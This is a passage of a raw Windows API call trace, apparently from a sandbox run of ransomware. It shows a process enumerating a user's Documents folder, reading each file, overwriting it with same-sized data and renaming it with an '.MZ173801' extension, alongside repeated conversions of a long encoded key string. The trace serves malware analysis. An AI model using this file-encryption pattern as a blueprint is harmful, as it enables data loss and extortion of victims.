lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.115] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.115] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5fc9410, ftCreationTime.dwHighDateTime=0x1d5e101, ftLastAccessTime.dwLowDateTime=0xcc0b1560, ftLastAccessTime.dwHighDateTime=0x1d5ee15, ftLastWriteTime.dwLowDateTime=0xa9f1d98c, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2458, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9JNTT48UjoH.pps.MZ173801", cAlternateFileName="9JNTT4~1.MZ1")) returned 1 [0122.115] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.115] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.115] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecdfdf50, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0x2d4788a0, ftLastAccessTime.dwHighDateTime=0x1d5eee2, ftLastWriteTime.dwLowDateTime=0x2d4788a0, ftLastWriteTime.dwHighDateTime=0x1d5eee2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="dQSfhEFRy_gFg", cAlternateFileName="DQSFHE~1")) returned 1 [0122.115] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0122.115] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0122.115] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\*.*", lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecdfdf50, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0x2d4788a0, ftLastAccessTime.dwHighDateTime=0x1d5eee2, ftLastWriteTime.dwLowDateTime=0x2d4788a0, ftLastWriteTime.dwHighDateTime=0x1d5eee2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bdc8 [0122.115] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecdfdf50, ftCreationTime.dwHighDateTime=0x1d5eae6, ftLastAccessTime.dwLowDateTime=0x2d4788a0, ftLastAccessTime.dwHighDateTime=0x1d5eee2, ftLastWriteTime.dwLowDateTime=0x2d4788a0, ftLastWriteTime.dwHighDateTime=0x1d5eee2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0122.115] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x951e9970, ftCreationTime.dwHighDateTime=0x1d5ef8f, ftLastAccessTime.dwLowDateTime=0x25a9c020, ftLastAccessTime.dwHighDateTime=0x1d5e3c2, ftLastWriteTime.dwLowDateTime=0x25a9c020, ftLastWriteTime.dwHighDateTime=0x1d5e3c2, nFileSizeHigh=0x0, nFileSizeLow=0x402a, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="1d9fEi.docx", cAlternateFileName="1D9FEI~1.DOC")) returned 1 [0122.115] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c8 | out: lpLocalFileTime=0x19f4c8) returned 1 [0122.115] FileTimeToDosDateTime (in: lpFileTime=0x19f4c8, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.115] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\1d9fEi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\1d9fei.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x951e9970, ftCreationTime.dwHighDateTime=0x1d5ef8f, ftLastAccessTime.dwLowDateTime=0x25a9c020, ftLastAccessTime.dwHighDateTime=0x1d5e3c2, ftLastWriteTime.dwLowDateTime=0x25a9c020, ftLastWriteTime.dwHighDateTime=0x1d5e3c2, nFileSizeHigh=0x0, nFileSizeLow=0x402a)) returned 1 [0122.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.116] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.116] GetCurrentThreadId () returned 0x1358 [0122.116] GetCurrentThreadId () returned 0x1358 [0122.116] GetCurrentThreadId () returned 0x1358 [0122.117] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.117] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.117] GetCurrentThreadId () returned 0x1358 [0122.117] GetCurrentThreadId () returned 0x1358 [0122.117] GetCurrentThreadId () returned 0x1358 [0122.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\1d9fEi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\1d9fei.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.117] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f40c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f40c*=0) returned 0x0 [0122.117] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.117] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x402a [0122.117] SetFilePointer (in: hFile=0x408, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f404*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f404*=0) returned 0x0 [0122.117] ReadFile (in: hFile=0x408, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x402a, lpNumberOfBytesRead=0x19f418, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f418*=0x402a, lpOverlapped=0x0) returned 1 [0122.118] CloseHandle (hObject=0x408) returned 1 [0122.119] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\1d9fEi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\1d9fei.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x408 [0122.120] WriteFile (in: hFile=0x408, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x402a, lpNumberOfBytesWritten=0x19f424, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f424*=0x402a, lpOverlapped=0x0) returned 1 [0122.121] CloseHandle (hObject=0x408) returned 1 [0122.122] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\1d9fEi.docx" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\1d9fei.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\1d9fEi.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\1d9fei.docx.mz173801")) returned 1 [0122.123] GetCurrentThreadId () returned 0x1358 [0122.123] GetCurrentThreadId () returned 0x1358 [0122.123] GetCurrentThreadId () returned 0x1358 [0122.123] GetCurrentThreadId () returned 0x1358 [0122.123] GetCurrentThreadId () returned 0x1358 [0122.123] GetCurrentThreadId () returned 0x1358 [0122.123] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6675ebe0, ftCreationTime.dwHighDateTime=0x1d5e7a2, ftLastAccessTime.dwLowDateTime=0x5fed7c70, ftLastAccessTime.dwHighDateTime=0x1d5e8e2, ftLastWriteTime.dwLowDateTime=0x5fed7c70, ftLastWriteTime.dwHighDateTime=0x1d5e8e2, nFileSizeHigh=0x0, nFileSizeLow=0x145bb, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="bbDt5hQeu2UjYm.odp", cAlternateFileName="BBDT5H~1.ODP")) returned 1 [0122.123] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.123] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.123] FindNextFileW (in: hFindFile=0xa1bdc8, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c36f0, ftCreationTime.dwHighDateTime=0x1d5e10c, ftLastAccessTime.dwLowDateTime=0xbc966ab0, ftLastAccessTime.dwHighDateTime=0x1d5ed18, ftLastWriteTime.dwLowDateTime=0xbc966ab0, ftLastWriteTime.dwHighDateTime=0x1d5ed18, nFileSizeHigh=0x0, nFileSizeLow=0x156d0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="dMoow7sypidEXF.ppt", cAlternateFileName="DMOOW7~1.PPT")) returned 1 [0122.123] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0122.123] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0122.123] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Fhb23ambk-o\\dQSfhEFRy_gFg\\dMoow7sypidEXF.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\fhb23ambk-o\\dqsfhefry_gfg\\dmoow7sypidexf.ppt"), fInfoLevelId=0x0, lpFileInformation=0x19f458 | out: lpFileInformation=0x19f458*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c36f0, ftCreationTime.dwHighDateTime=0x1d5e10c, ftLastAccessTime.dwLowDateTime=0xbc966ab0, ftLastAccessTime.dwHighDateTime=0x1d5ed18, ftLastWriteTime.dwLowDateTime=0xbc966ab0, ftLastWriteTime.dwHighDateTime=0x1d5ed18, nFileSizeHigh=0x0, nFileSizeLow=0x156d0)) returned 1 [0122.124] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.124] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.124] GetCurrentThreadId () returned 0x1358 [0122.124] GetCurrentThreadId () returned 0x1358 [0122.124] GetCurrentThreadId () returned 0x1358 [0122.124] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwR